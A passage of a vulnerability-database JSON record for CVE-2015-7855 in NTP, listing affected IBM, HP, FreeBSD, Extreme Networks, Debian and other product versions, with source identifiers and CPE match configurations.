"vendor": "ibm", "version": "7.1.4.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.15" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.16" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9.5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8.7" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8.15" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.7.16" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.12.9" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.12" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.11" }, { "model": "vsr1008 comware virtual services router", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "70" }, { "model": "vsr1004 comware virtual services router", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "70" }, { "model": "vsr1001 virtual services router day evaluation software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "600" }, { "model": "vsr1001 comware virtual services router", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "70" }, { "model": "msr4080 router chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "msr4060 router chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "msr4000 taa-compliant mpu-100 main processing unit", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "msr4000 mpu-100 main processing unit", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "msr3064 router", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "msr3044 router", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "msr3024 taa-compliant ac router", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "msr3024 poe router", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "msr3024 dc router", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "msr3024 ac router", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "msr3012 dc router", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "msr3012 ac router", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "msr2004-48 router", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "msr2004-24 ac router", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "msr2003 taa-compliant ac router", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "msr2003 ac router", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "msr1003-8s ac router", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "msr1002-4 ac router", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "hsr6808 router chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "hsr6804 router chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "hsr6802 router chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "hsr6800 rse-x3 router main processing unit", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "hsr6800 rse-x2 router taa-compliant main processing", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "hsr6800 rse-x2 router main processing unit", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "hsr6602-xg taa-compliant router", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "hsr6602-xg router", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "hsr6602-g taa-compliant router", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "hsr6602-g router", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "flexfabric taa-compliant switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "79100" }, { "model": "flexfabric switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "79100" }, { "model": "flexfabric 7.2tbps taa-compliant fabric/main processing uni", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "79100" }, { "model": "flexfabric 7.2tbps fabric main processing unit", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7910/0" }, { "model": "flexfabric 2.4tbps taa-compliant fabric/main processing uni", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "79100" }, { "model": "flexfabric 2.4tbps fabric main processing unit", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7910/0" }, { "model": "flexfabric taa-compliant switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "79040" }, { "model": "flexfabric switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "79040" }, { "model": "flexfabric 4-slot taa-compliant switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "59300" }, { "model": "flexfabric 4-slot switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "59300" }, { "model": "flexfabric 32qsfp+ taa-compliant switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "59300" }, { "model": "flexfabric 32qsfp+ switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "59300" }, { "model": "flexfabric 2qsfp+ 2-slot taa-compliant switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "59300" }, { "model": "flexfabric 2qsfp+ 2-slot switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "59300" }, { "model": "flexfabric 5900cp 48xg 4qsfp+ taa-compliant", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "flexfabric 5700-48g-4xg-2qsfp+ taa-compliant switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "flexfabric 5700-48g-4xg-2qsfp+ switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "flexfabric 5700-40xg-2qsfp+ taa-compliant switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "flexfabric 5700-40xg-2qsfp+ switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "flexfabric 5700-32xgt-8xg-2qsfp+ taa-compliant switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "flexfabric 5700-32xgt-8xg-2qsfp+ switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "flexfabric 12916e switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "flexfabric switch ac chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "129160" }, { "model": "flexfabric main processing unit", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "129160" }, { "model": "flexfabric taa-compliant switch ac chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "129100" }, { "model": "flexfabric taa-compliant main processing unit", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "129100" }, { "model": "flexfabric switch ac chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "129100" }, { "model": "flexfabric main processing unit", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "129100" }, { "model": "flexfabric 12908e switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "flexfabric 12904e switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "flexfabric 12904e main processing unit", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "flexfabric 12900e main processing unit", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "flexfabric switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11908-v0" }, { "model": "flexfabric main processing unit", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "119000" }, { "model": "ff 5900cp-48xg-4qsfp+ switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "ff 12518e dc switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "ff 12518e ac switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "ff 12508e dc switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "ff 12508e ac switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "ff 12500e mpu", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "a12518 switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "a12508 switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "75100" }, { "model": "switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "75060" }, { "model": "switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "75030" }, { "model": "switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "75020" }, { "model": "main processing unit", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "75020" }, { "model": "5920af-24xg taa switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "5920af-24xg switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "5900af-48xgt-4qsfp+ switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "5900af-48xg-4qsfp+ taa switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "5900af-48xg-4qsfp+ switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "5900af-48g-4xg-2qsfp+ switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "5900af 48xgt 4qsfp+ taa-compliant switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "5900af 48g 4xg 2qsfp+ taa-compliant", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "48g poe+ 4sfp+ hi 1-slot switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "55100" }, { "model": "48g 4sfp+ hi 1-slot switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "55100" }, { "model": "24g sfp 4sfp+ hi 1-slot switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "55100" }, { "model": "24g poe+ 4sfp+ hi 1-slot switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "55100" }, { "model": "24g 4sfp+ hi 1-slot switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "55100" }, { "model": "5130-48g-poe+-4sfp+ ei switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "5130-48g-poe+-4sfp+ ei brazil switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "5130-48g-poe+-2sfp+-2xgt ei switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "5130-48g-4sfp+ ei switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "5130-48g-4sfp+ ei brazil switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "5130-48g-2sfp+-2xgt ei switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "5130-24g-sfp-4sfp+ ei switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "5130-24g-poe+-4sfp+ ei switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "5130-24g-poe+-4sfp+ ei brazil switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "5130-24g-poe+-2sfp+-2xgt ei switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "5130-24g-4sfp+ ei switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "5130-24g-4sfp+ ei brazil switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "5130-24g-2sfp+-2xgt ei switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "48g poe+ 4sfp+ 1-slot hi switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "51300" }, { "model": "48g 4sfp+ 1-slot hi switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "51300" }, { "model": "24g poe+ 4sfp+ 1-slot hi switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "51300" }, { "model": "24g 4sfp+ 1-slot hi switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "51300" }, { "model": "1950-48g-2sfp+-2xgt-poe+ switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "1950-48g-2sfp+-2xgt switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "1950-24g-4xg switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "1950-24g-2sfp+-2xgt-poe+ switch", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "125180" }, { "model": "dc switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "125180" }, { "model": "ac switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "125180" }, { "model": "switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "125080" }, { "model": "dc switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "125080" }, { "model": "ac switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "125080" }, { "model": "dc switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "125040" }, { "model": "ac switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "125040" }, { "model": "mpu w/comware os", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12500v70" }, { "model": "main processing unit", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "125000" }, { "model": "taa switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "105120" }, { "model": "switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "105120" }, { "model": "taa switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10508-v0" }, { "model": "switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10508-v0" }, { "model": "taa switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "105080" }, { "model": "switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "105080" }, { "model": "taa switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "105040" }, { "model": "switch chassis", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "105040" }, { "model": "type d taa-compliant with comware os main processing un", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10500v70" }, { "model": "type d main processing unit with comware os", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10500v70" }, { "model": "type a mpu w/comware os", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10500v70" }, { "model": "9.3-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p25", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p24", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p22", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p21", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-rc", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-beta3-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-beta1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-beta1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-beta1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.3" }, { "model": "10.2-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.2-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.2-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.2-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.2-beta2-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.2-beta2-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.2" }, { "model": "10.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p19", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p17", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-rc4-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-rc2-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-beta3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-beta1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.1" }, { "model": "summit wm3000 series", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "0" }, { "model": "purview appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.4" }, { "model": "purview appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.0" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.0" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "16.1.2" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7.4" }, { "model": "extremexos patch", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7.38" }, { "model": "extremexos patch", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7.31" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7.2" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.6.4" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "16.1" }, { "model": "extremexos 15.4.1.3-patch1-10", "scope": null, "trust": 0.3, "vendor": "extremenetworks", "version": null }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.4.1.0" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.3" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "ruggedcom rox", "scope": "ne", "trust": 0.3, "vendor": "siemens", "version": "2.9.0" }, { "model": "automation stratix", "scope": "ne", "trust": 0.3, "vendor": "rockwell", "version": "590015.6.3" }, { "model": "ntp", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": "4.3.77" }, { "model": "4.2.8p4", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "qlogic virtual fabric extension module for ibm bladecenter", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0.3.14.0" }, { "model": "qlogic 8gb intelligent pass-thru module and san switch module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.10.1.37.00" }, { "model": "ib6131 gb infiniband switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "83.5.1000" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.7.03.00" }, { "model": "flex system en6131 40gb ethernet switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5.1000" }, { "model": "9.3-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p29", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.2-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.2-release-p6", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p23", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "purview appliance", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "7.0.3" }, { "model": "netsight appliance", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "6.4" }, { "model": "nac appliance", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "6.4" }, { "model": "extremexos", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "21.1.1" }, { "model": "extremexos", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "16.2" } ], "sources": [ { "db": "BID", "id": "77283" }, { "db": "JVNDB", "id": "JVNDB-2015-007707" }, { "db": "CNNVD", "id": "CNNVD-201510-575" }, { "db": "NVD", "id": "CVE-2015-7855" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.2.8", "versionStartIncluding": "4.2.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.3.77", "versionStartIncluding": "4.3.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:netapp:oncommand_balance:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:oncommand_performance_manager:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:oncommand_unified_manager:-:*:*:*:*:clustered_data_ontap:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netapp:clustered_data_ontap:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:netapp:data_ontap:-:*:*:*:*:7-mode:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": 